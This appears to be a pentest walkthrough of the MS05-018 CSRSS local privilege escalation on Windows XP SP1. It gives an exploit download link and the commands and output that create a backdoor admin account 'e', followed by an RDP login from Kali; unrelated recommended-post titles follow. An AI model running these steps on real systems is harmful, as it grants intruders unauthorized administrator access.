MS05-018

MS05-018

Works for Windows 2K SP3/4 | Windows XP SP1/2

Download ms05-018.exe:

https://github.com/xiaoxiaoleo/windows_pentest_tools/tree/master/提权工具/windows提权工具/MS05018—CSRSS.EXE漏洞利用/MS05018—CSRSS.EXE漏洞利用/tool

C:\WINDOWS\system32>systeminfo

systeminfo

Host Name:                 VULNBOX

OS Name:                   Microsoft Windows XP Professional

OS Version:                5.1.2600 Service Pack 1 Build 2600

Processor(s):              1 Processor(s) Installed.

                           [01]: x86 Family 6 Model 12 Stepping 2 GenuineIntel ~3457 Mhz

BIOS Version:              INTEL  - 6040000

Windows Directory:         C:\WINDOWS

System Directory:          C:\WINDOWS\System32

Boot Device:               \Device\HarddiskVolume1

System Locale:             en-us;English (United States)

Input Locale:              en-us;English (United States)

Time Zone:                 (GMT) Greenwich Mean Time : Dublin, Edinburgh, Lisbon, London

Hotfix(s):                 3 Hotfix(s) Installed.

                           [01]: File 1

                           [02]: Q147222

                           [03]: KB893803v2 - Update

C:\Inetpub\wwwroot>MS05-018.exe

ms5.exe

MS05-018 windows CSRSS.EXE Stack Overflow exp v1.0

Affect: Windows 2000 sp3/sp4 (all language)

Coded by eyas <eyas at xfocus.org> --->http://www.xfocus.net

compile by Iceskysl [IST] --->www.iceskysl.net

Usage: ms5.exe pid

[+] PID=440 Process=winlogon.exe

C:\Inetpub\wwwroot>MS05-018.exe 440

ms5.exe 440

MS05-018 windows CSRSS.EXE Stack Overflow exp v1.0

Affect: Windows 2000 sp3/sp4 (all language)

Coded by eyas <eyas at xfocus.org> --->http://www.xfocus.net

compile by Iceskysl [IST] --->www.iceskysl.net

[+] FreeConsole ok.

[+] AllocConsole ok.

[+] Get Console Title OK:"ms5.exe 440"

[+] bingo! found hwnd=70038

[+] start search "FF E4" in ntdll.dll

[+] found "FF E4"(jmp esp) in 77FB59CC[ntdll.dll]

[+] CreateFileMapping OK!

[+] MapViewOfFile OK!

[+] Send Exploit!

[+] Done.

It's will successful  add user :

username=e

password=asd#321

root@kali:~# rdesktop -u e -p asd#321  x.x.x.x

Windows XP SP1 Privilege Escalation的更多相关文章

  1. OD: Heap in Windows 2K & XP SP1

    Windows 堆溢出 MS 没有完全公开 Windows 的堆管理细节,目前对 Windows 堆的了解主要基于技术狂热者.黑客.安全专家.逆向工程师等的个人研究成果. 目前 Windows NT4 ...

  2. Windows XP系统服役13年今正式退休

    清明已过,服役13年的微软Windows XP系统也于今日正式“退休”.尽管这之后XP系统仍可以继续使用,但微软不再提供官方服务支持.对于中国数以亿计的XP用户来说,一方面是对已经使用了13年的操作系 ...

  3. Windows XP系列全下载(均为MSDN原版)

    正版windows xp sp3 下载大全(附:正版密钥) 微软MSDN Windows XP Professional下载 Windows XP Professional 简体中文 (最原始版本,无 ...

  4. [EXP]Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation

    Windows: DfMarshal Unsafe Unmarshaling Elevation of Privilege (Master) Platform: Windows (not tested ...

  5. 解决libcurl7.50.3在windows XP SP3 VC++ 6.0下编译报错 unresolved external symbol __imp__IdnToAscii@20 unresolved external symbol __imp__IdnToUnicode@20

    错误重现: --------------------Configuration: curl - Win32 LIB Debug DLL Windows SSPI DLL WinIDN--------- ...

  6. Linux/Unix System Level Attack、Privilege Escalation(undone)

    目录 . How To Start A System Level Attack . Remote Access Attack . Local Access Attack . After Get Roo ...

  7. 技术文集:万能WINDOWS XP封装

    这里将系统封装分为3步:做系统.封装.部署 一.做系统 平台不限,但不建议在虚拟机上制作.CPU及主板芯片没有限制,关于intelide和intelppm的不兼容问题,深度白金3in1并没有删除这些注 ...

  8. WinSetupFromUSB – Install Windows XP from USB Flash Drive

    http://myeeeguides.wordpress.com/2008/11/15/winsetupfromusb-install-windows-xp-from-usb-flash-drive/ ...

  9. 原版Windows XP Pro With SP3 VOL MSDN简体中文专业版

    2008年5月2日,微软推出Windows XP Pro With SP3 VOL MSDN x86 32位简体中文专业版,这是最经典也是我最喜爱的操作系统之一.在MSDN(微软开发者网络)的网站上查 ...

随机推荐

  1. Android ImageSwitcher 配合Picasso解决内存溢出(OOM)问题

    最近项目中用到了 ImageSwitcher 来实现图片切换,使用起来很简单,但发现当图片比较大(超过了3M)时,程序出现了内存溢出(OOM)问题而崩溃了. 原因就是图片太大了,显示到 ImageVi ...

  2. 玩转Vim-札记(二)

    玩转Vim-札记(二) 距上篇博文已有一周有余,上次主要介绍了编辑器之神Vim的起源.安装并介绍了两种模式以及一些简单的操作.本次将继续对Vim的使用进行介绍. 登堂入室 首先接着说移动吧: 0 → ...

  3. 『AngularJS』Service

    理解Angular 服务 什么是Angular Service Angular 服务是为web应用执行特定任务的单例对象或方法. 注:如果组件是为了内容呈现的功能复用,那么服务就是为组件进行功能复用. ...

  4. 使用IDEA快速搭建Gradle项目

  5. Ubuntu下使用Git_1

    这里小小的记录一下我在Ubuntu下使用版本控制工具Git的过程.在学习使用Git的时候,我发现了一个很好的网站,这里分享一下,大家共同学习. 猴子都能懂的Git入门 http://git.wiki. ...

  6. 如何用Fiddler 拦住RestAssured发出的请求

    用RestAssured 发出的请求并不能直接被fiddler 拦截,可以在初始化的时候做出如下配置: RestAssured.proxy("localhost", 8888); ...

  7. hdu 1556 Color the ball (区间更新 求某点值)

    Problem Description N个气球排成一排,从左到右依次编号为1,2,3....N.每次给定2个整数a b(a <= b),lele便为骑上他的“小飞鸽"牌电动车从气球a ...

  8. deeplearning.ai课程学习(4)

    第四周:深层神经网络(Deep Neural Networks) 1.深层神经网络(Deep L-layer neural network) 在打算使用深层神经网络之前,先去尝试逻辑回归,尝试一层然后 ...

  9. POJ 1703 Find them, Catch them(并查集拓展)

    Description The police office in Tadu City decides to say ends to the chaos, as launch actions to ro ...

  10. 简明Python3教程 1.介绍

    Python是少有的几种既强大又简单的编程语言.你将惊喜地发现通过使用Python即可轻松专注于解决问题而非和你所用的语言格式与结构. 下面是Python的官方介绍: Python is an eas ...